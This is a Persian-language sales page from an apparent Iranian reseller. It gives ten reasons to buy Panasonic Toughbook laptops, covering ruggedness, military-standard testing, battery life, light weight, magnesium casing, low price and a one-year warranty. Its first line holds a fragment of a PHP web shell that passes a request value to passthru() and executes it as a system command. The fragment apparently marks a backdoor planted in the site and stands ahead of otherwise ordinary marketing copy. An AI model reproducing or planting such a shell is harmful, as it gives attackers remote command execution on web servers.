'; passthru($cmd); echo ''; exit(); } ?>
You are here: Why Toughbook

اگر چه در بازار لپ تاپ ایران بیشتر اسامی غیر از Panasonic Toughbook شنیده می شود اما حضور موثر و با کیفیت دیگر محصولات Panasonic در بازار ایران باعث می شود مشتری ایرانی به راحتی Toughbook (مارک Panasonic در بازار لپ تاپ) را بپذیرد. با این حال در ادامه دلایلی ذکر خواهیم کرد که Toughbook همانند دیگر محصولات Panasonic ممتاز و قابل اتکا است. هر چند Toughbook مدل های متنوعی برای مصرف شخصی دارد که ویژه پسندان را به شدت مجذوب می کند اما رویکرد اصلی لپ تاپ های Toughbook ارائه مدل هایی مستحکم، ضد ضربه و مناسب برای کاربردها و مشاغل خاص نظامی و صنعتی است.




ده دلیل برای اینکه Panasonic Toughbook بهترین انتخاب است:

1. تمام مدل های Toughbook حتی آنها که بسیار ظریف و کم حجم هستند به طور شگفت انگیزی مقاوم و محکمند. این موضوع در مورد مدل های خاصی آن قدر از سوی طراحان مورد توجه قرار گرفته که در عمل لپ تاپ به یک بلدزر دیجیتال شبیه شده است. مشاهده فیلم های تست های استاندارد نظامی MIL-STD-810G که لپ تاپ های Toughbook از آن پیروی می کنند را پیش از هر کاری انجام دهید.

 


 

2. بر خلاف ایران Toughbook در دیگر کشورهای جهان بسیار شناخته شده و محبوب است. مشتری های عمده این محصول به جز مصرف کنندگان شخصی، مراکز تحقیقاتی و عملیاتی سازمان های نظامی ، شرکت های نفتی و پیمانکاران عمرانی و ساختمانی هستند. جالب است که تا سال 2006 ارتش امریکا در عراق از 35000 لپ تاپ Toughbook استفاده می کند.

 


 

3. لپ تاپ های Toughbook طراحی زیبایی دارند. معمولا مدل های سری T، F،C و S مصرف کنندگان شخصی را شیفته خود می کند. باریک و کوچک بودن این مدل ها بر محبویت آنها افزوده است.

 


 

4. زمانی که یک لپ تاپ معمولی می تواند با باطری و بدون نیاز به شارژ مجدد کار کند چیزی بین دو تا سه ساعت است اما تمام مدل های Toughbook به طور عجیبی می تواند ساعات طولانی بی نیاز از شارژ مجدد کار کنند. هفت ساعت کار بدون نیاز به شارژ مجدد یک عدد کاملا معمولی در میان همه مدل های Toughbook است و این عدد تا 12 ساعت در برخی مدل ها می رسد.

 


 

5. بدون شک تجارتخانه بهین رایانه به عنوان پشتیبان لپ تاپ های Toughbook در ایران ارزان ترین قیمت را در سراسر کشور و در تمام نمایندگی های فروش به صورت یکسان عرضه می نماید.

 


 

6. اکثر لپ تاپ های Toughbook برای کنترل کیفیت تست های متنوعی را تحت استاندارد MIL-STD-810G که یک استاندارد معتبر نظامی است، پشت سر گذاشته اند. این استاندارد موارد سخت گیرانه ای در مورد ضربه، لرزش، کار زیر باران یا گرد و خاک و حتی دما و فشار محیط را به سازندگان تحمیل می کند که Toughbook از آن سربلند بیرون آمده است. 

 


 

7. به نسبت میزان تلاشی که برای مقاوم سازی مدل های گوناگون Toughbook انجام گرفته ، این لپ تاپ ها حتی به نسبت مارک های دیگر که استحکام خاصی ندارند خیلی سبک محسوب می شوند. مخصوصا مدل های های سری T، F،C و S که زیر یک و نیم کیلو وزن دارند.

 


 

8. پیکربندی اجزاء تمام مدل های Toughbook مثل قدرت CPU یا مقدار حافظه RAM در آن بیش از آنکه تحت تاثیر تبلیغات بازاری یا میل کودکانه حرص زننده باشد زمینه را برای یک انتخاب عاقلانه صرفا مبتنی بر نیاز واقعی فراهم می کند. بر خلاف بسیاری از مارک های دیگر که تلاش می کنند تمام مدل های خود را در سطح یک سوپرجت نگه دارند، پاناسونیک تنوع یک هواپیمای تک موتوره سبک تفریحی تا یک سوپرجت را برای مشتریانش فراهم می‌کند. پردازنده های Toughbook از سری Core 2 Duo تا Core i5 متنوعند چرا مصرف کننده ای که نیاز پردازشی واقعی زیادی ندارد باید هزینه اضافی بپردازد؟ 

 


 

9. تمام مدل های Toughbook حتی آنها که بسیار ظریف و کم حجم هستند پوسته ای از آلیاژ منیزیم دارند. این آلیاژ به نسبت پوشش های معمول ABS پلاستیکی بیست برابر مقاوم تر است.

 


 

10. مشتریان باهوش و حرفه ای محصولات و قطعات الکترونیکی در ایران می دانند خدمات پس از فروش خوب حتی از مارک جنس هم مهم تر است. شرکت تجارتخانه بهین رایانه هر یک از محصولات Toughbook را به مدت یک سال در داخل ایران گارانتی می کند. وجود سیستم هوشمند خدمات پس از فروش خریدار را از دریافت خدمات سریع و آسان آسوده می سازد.

 


***